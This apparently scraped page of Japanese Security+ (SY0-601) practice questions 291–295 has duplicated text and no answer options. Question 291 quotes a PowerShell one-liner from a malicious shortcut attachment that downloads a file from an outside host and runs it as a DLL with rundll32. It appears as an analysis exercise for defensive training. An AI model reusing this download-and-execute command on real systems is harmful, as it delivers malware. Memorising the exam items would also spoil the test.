SY0-601 試験問題 291
従業員が、Updates.Lnk という通常とは異なるファイルが添付された電子メールを受信しました。セキュリティ アナリストがファイルのリバース エンジニアリングを行ったところ、次のスクリプトが実行されることが判明しました。
C:\Windows\System32\WindowsPowerShell\vl.0\powershell.exe -URI https://somehost.com/04EB18.jpg
-OutFile $env:TEMP\autoupdate.dll;Start-Process rundll32.exe $env:TEMP\autoupdate.dll アナリストが発見した内容を最もよく表しているのは次のどれですか?
C:\Windows\System32\WindowsPowerShell\vl.0\powershell.exe -URI https://somehost.com/04EB18.jpg
-OutFile $env:TEMP\autoupdate.dll;Start-Process rundll32.exe $env:TEMP\autoupdate.dll アナリストが発見した内容を最もよく表しているのは次のどれですか?
SY0-601 試験問題 292
データ所有者には、環境内に含まれるさまざまな種類のデータに対して適切なデータ分類と破棄方法を割り当てる役割が与えられています。


SY0-601 試験問題 293
新しく購入した企業 WAP は、可能な限り最も安全な方法で構成する必要があります。
説明書
ネットワーク図上の以下の項目をクリックし、それに応じて設定してください。
ワップ
DHCP サーバー
AAA サーバー
ワイヤレスコントローラー
LDAP サーバー
いつでもシミュレーションの初期状態に戻したい場合は、「すべてリセット」ボタンをクリックしてください。


説明書
ネットワーク図上の以下の項目をクリックし、それに応じて設定してください。
ワップ
DHCP サーバー
AAA サーバー
ワイヤレスコントローラー
LDAP サーバー
いつでもシミュレーションの初期状態に戻したい場合は、「すべてリセット」ボタンをクリックしてください。


SY0-601 試験問題 294
ある組織は、ネットワーク上でマルウェアが蔓延したため、インシデント対応計画を開始しました。組織はフォレンジック チームを招集し、インターネットに接続している Windows サーバーが最初の侵害の可能性のあるポイントであると特定しました。検出されたマルウェア ファミリは、手動でサーバーにログオンし、悪意のあるコードを実行することで配布されることがわかっています。感染ベクターからの再感染を防ぐには、次のどのアクションが最適ですか。
SY0-601 試験問題 295
ある遊園地では、顧客の指紋を検証してチケットの共有が行われていないことを確認する生体認証システムを導入しています。遊園地のオーナーは何よりも顧客を重視しており、セキュリティよりも顧客の利便性を重視しています。このため、セキュリティ チームが最初に優先すべき機能は次のうちどれですか。



